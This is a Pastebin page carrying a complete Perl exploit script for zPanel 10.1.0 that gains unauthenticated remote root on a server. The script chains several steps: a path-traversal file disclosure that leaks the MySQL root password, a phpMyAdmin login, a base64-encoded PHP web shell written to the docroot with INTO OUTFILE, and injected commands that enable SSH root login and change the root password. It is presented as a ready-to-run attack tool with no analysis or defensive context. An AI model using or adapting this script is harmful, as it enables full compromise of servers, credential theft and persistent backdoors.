SHARE
TWEET

zPanel 10.1.0 Remote Root Exploit

a guest Oct 27th, 2015 1,027 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. #********************************************************************************
  3. #
  4. #
  5. #                Unauthenticated Zpanel Remote Root Exploit
  6. #                            japp@0xlabs.com
  7. #                         http://www.0xlabs.com
  8. #
  9. #
  10. #********************************************************************************
  11.  
  12.  
  13. use LWP::UserAgent;
  14.  
  15. $FILE_DISCLOSURE = "etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php";
  16. $PMA_PATH        = "etc/apps/phpmyadmin/index.php";
  17. $PMA_DOCROOT     = "etc/apps/phpmyadmin/import.php";
  18.  
  19. print "\n\n";
  20. print "\t================================\n";
  21. print "\t[  Zpanel Remote Root Exploit  ]\n";
  22. print "\t[     By japp\@0xlabs.com       ]\n";
  23. print "\t[       www.0xlabs.com         ]\n";
  24. print "\t================================\n\n";
  25.  
  26.  
  27. my $argc = @ARGV;
  28.  
  29. if ( $argc != 1 )
  30. {
  31.         print " [*] Usage: ".$0." <http://localhost/zpanel/>\n";
  32.         exit 1;
  33. }
  34.  
  35. my $ua = http_handler();
  36. my $url = $ARGV[0];
  37.  
  38. if ( $url !~ /^http/ ){ $url = "http://".$url; }
  39. if ( $url !~ /\/$/ )  { $url .= "/"; }
  40.  
  41. print " [*] Trying to get MySQL root password...\n";
  42. my $root_pass = GetPasswd ($url, $ua);
  43. print " [+] Mysql root password: ".$root_pass."\n";
  44.  
  45. print " [*] Trying to access through phpMyAdmin...\n";
  46. my $token = AccessPma ($root_pass, $url, $ua);
  47. print " [+] Login successfully\n";
  48.  
  49. print " [*] Getting Zpanel document root...\n";
  50. my $docroot = GetDocRoot ($token, $url, $ua);
  51. print " [+] Zpanel document root: ".$docroot."\n";
  52.  
  53. print " [*] Uploading shell...\n";
  54. UploadShell ($token, $docroot, $url, $ua);
  55. print " [+] Shell uploaded successfully!\n";
  56.  
  57. print " [+] Enabling SSH root login\n";
  58. EnableRoot ($url, $ua);
  59.  
  60. print " [*] Changing root password...\n";
  61. ChangePasswd ($url, $ua);
  62.  
  63. print " [+] Root password changed\n\n";
  64. print " [!] Now you can login through SSH. Root password is '0xlabs'\n\n";
  65.  
  66. sub ChangePasswd
  67. {
  68.         my $url     = $_[0];
  69.         my $ua      = $_[1];
  70.  
  71.         my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"root:0xlabs\'\" \"|/usr/sbin/chpasswd;%23\"");
  72. }
  73.  
  74. sub EnableRoot
  75. {
  76.         my $url     = $_[0];
  77.         my $ua      = $_[1];
  78.  
  79.         my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"\';sed -i \'s-PermitRootLogin no-PermitRootLogin yes-g\'\" \"/etc/ssh/*hd_config %23\"");
  80.  
  81. }
  82.  
  83. sub UploadShell
  84. {
  85.         my $token   = $_[0];
  86.         my $docroot = $_[1];
  87.         my $url     = $_[2];
  88.         my $ua      = $_[3];
  89.  
  90.         my %pdata;
  91.  
  92.         $pdata{"token"}         = $token;
  93.         $pdata{"sql_query"}     = "SELECT '<?php eval(base64_decode(\"cGFzc3RocnUoJF9HRVRbImMiXSk7\"));?>' INTO OUTFILE '".$docroot."0xlabs.php'";
  94.         $pdata{"ajax_request"}  = "true";
  95.  
  96.         http_post ($url.$PMA_DOCROOT, $ua, %pdata);
  97.  
  98.         my $rsp = $ua->get ($url."0xlabs.php?c=echo 0xlabs_rulz");
  99.  
  100.         if (!$rsp->is_success)
  101.         {
  102.                 die (" [-] Can't locate uploaded shell at '".$url."0xlabs.php'\n");
  103.         }
  104.         my $cont = $rsp->content;
  105.  
  106.         if ( $cont !~ /0xlabs_rulz/ )
  107.         {
  108.                 die (" [-] Can't validate uploaded shell. Check manually: ".$url."0xlabs.php?c=dir\n");
  109.         }
  110. }
  111.  
  112. sub GetDocRoot
  113. {
  114.         my $token   = $_[0];
  115.         my $url     = $_[1];
  116.         my $ua      = $_[2];
  117.  
  118.         my %pdata;
  119.  
  120.         $pdata{"token"}         = $token;
  121.         $pdata{"sql_query"}     = "SELECT so_value_tx FROM zpanel_core.x_settings WHERE so_name_vc='zpanel_root'";
  122.         $pdata{"ajax_request"}  = "true";
  123.  
  124.         my $cont = http_post ($url.$PMA_DOCROOT, $ua, %pdata);
  125.  
  126.         $cont =~ /class=\"data grid_edit\s*">([^<]+)<\/td>/;
  127.  
  128.         return $1;
  129. }
  130.  
  131. sub AccessPma
  132. {
  133.         my $root_pass   = $_[0];
  134.         my $url         = $_[1];
  135.         my $ua          = $_[2];
  136.  
  137.         my %pdata;
  138.  
  139.         my $rsp = $ua->get ($url.$PMA_PATH);
  140.  
  141.         if (!$rsp->is_success) {
  142.                 die (" [-] Can't access to phpMyAdmin at '".$url.$PMA_PATH."'\n");
  143.         }
  144.  
  145.         my $cont = $rsp->content;
  146.  
  147.         $cont =~ /name=\"token\" value=\"(.+)\"/;
  148.  
  149.         my $token = $1;
  150.  
  151.         $pdata{"pma_username"}          = "root";
  152.         $pdata{"pma_password"}          = $root_pass;
  153.         $pdata{"server"}                = "1";
  154.         $pdata{"lang"}                  = "en";
  155.         $pdata{"collation_connection"}  = "utf8_general_ci";
  156.         $pdata{"token"}                 = $token;
  157.  
  158.         $cont = http_post ($url.$PMA_PATH, $ua, %pdata);
  159.  
  160.         if ( $cont =~ /Cannot log in to the MySQL server/ )
  161.         {
  162.                 die (" [-] Cannot log in to phpMyAdmin\n");
  163.         }
  164.  
  165.         $cont =~ /\?token=(.+)\"/;
  166.  
  167.         return $1;
  168. }
  169.  
  170.  
  171.  
  172. sub GetPasswd
  173. {
  174.         my $url = $_[0];
  175.         my $ua  = $_[1];
  176.  
  177.  
  178.         my $rsp = $ua->get ($url.$FILE_DISCLOSURE);
  179.  
  180.         if (!$rsp->is_success) {
  181.                 die (" [-] Can't get '".$url."'. Check URL.\n");
  182.         }
  183.  
  184.         my $cont = $rsp->content;
  185.  
  186.         if ( $cont !~ /root/ )
  187.         {
  188.                 die (" [-] Can't get root password. Patched?\n");
  189.         }
  190.  
  191.         my $flag = 0;
  192.         while ( $cont =~ /#DD0000\">[\'\"]+([^\"^\']+)[\'\"]+/g )
  193.         {
  194.                 $flag++;
  195.                 if ( $flag == 4 )
  196.                 {
  197.                         return $1;
  198.                 }
  199.         }
  200.  
  201.  }
  202.  
  203. sub http_post
  204. {
  205.                 my ($host, $ua, %data)  = @_;
  206.  
  207.                 my $rsp                 = $ua->post ($host, [%data]);
  208.  
  209.                 return ($rsp->content);
  210. }
  211.  
  212. sub http_handler
  213. {
  214.                 my $newhandler          = LWP::UserAgent->new() or return -1;
  215.  
  216.                 $newhandler->agent ("Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6");
  217.                 $newhandler->timeout(10);
  218.                 $newhandler->protocols_allowed(['http','https']);
  219.                 $newhandler->cookie_jar( {} );
  220.  
  221.                 push @{ $newhandler->requests_redirectable }, 'GET';
  222.                 push @{ $newhandler->requests_redirectable }, 'POST';
  223.  
  224.                 return $newhandler;
  225. }
RAW Paste Data
Top